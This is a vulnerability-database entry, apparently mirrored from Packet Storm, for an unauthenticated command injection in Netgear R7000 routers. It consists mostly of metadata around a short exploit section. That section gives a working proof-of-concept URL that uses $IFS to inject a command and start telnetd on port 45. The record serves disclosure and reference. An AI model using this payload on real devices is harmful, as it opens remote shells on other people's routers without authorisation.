Details of VAR-E-201612-0509

ID

VAR-E-201612-0509

TITLE

Netgear R7000 Command Injection

Trust: 0.5

sources: PACKETSTORM: 140074

DESCRIPTION

Netgear R7000 suffers from a command injection vulnerability.

Trust: 0.5

sources: PACKETSTORM: 140074

AFFECTED PRODUCTS

vendor:

netgear

model:

r7000

scope:

version:

Trust: 0.5

sources: PACKETSTORM: 140074

EXPLOIT

# Exploit Title: Netgear R7000 - Command Injection
# Date: 6-12-2016
# Exploit Author: Acew0rm
# Contact: https://twitter.com/Acew0rm1
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93

-Vulnerability
An unauthenticated user can inject commands threw
http://RouterIP/cgi-bin/;COMMAND.

-Proof Of Concept
http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.

Trust: 0.5

sources: PACKETSTORM: 140074

EXPLOIT HASH

LOCAL

SOURCE

md5:	1379a78a027d9591250dbd95fa139580
sha-1:	a2bd5ecf66ea4129ef7104157c689bab3179ddc8
sha-256:	8a3bd3bed526f1b1ea246ef0805d27f0da0e7419534db12188712e2368d99170

md5:	1379a78a027d9591250dbd95fa139580

Trust: 0.5

sources: PACKETSTORM: 140074

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 140074

CREDITS

Acew0rm

Trust: 0.5

sources: PACKETSTORM: 140074

EXTERNAL IDS

db:

PACKETSTORM

id:

140074

Trust: 0.5

sources: PACKETSTORM: 140074

SOURCES

db:

PACKETSTORM

id:

140074

LAST UPDATE DATE

2022-07-27T09:56:21.355000+00:00

SOURCES RELEASE DATE

db:

PACKETSTORM

id:

140074

date:

2016-12-08T17:22:22

ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT HASH

LOCAL

SOURCE

PRICE

TAGS

CREDITS

EXTERNAL IDS

SOURCES

LAST UPDATE DATE

SOURCES RELEASE DATE